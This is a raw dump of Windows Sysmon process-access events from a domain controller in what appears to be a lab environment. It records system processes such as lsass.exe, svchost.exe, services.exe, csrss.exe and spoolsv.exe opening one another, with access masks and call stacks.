13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.836{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.835{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.834{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.828{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.828{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.821{59A5CD1D-8E44-6005-0A00-00000000A301}848924C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.812{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 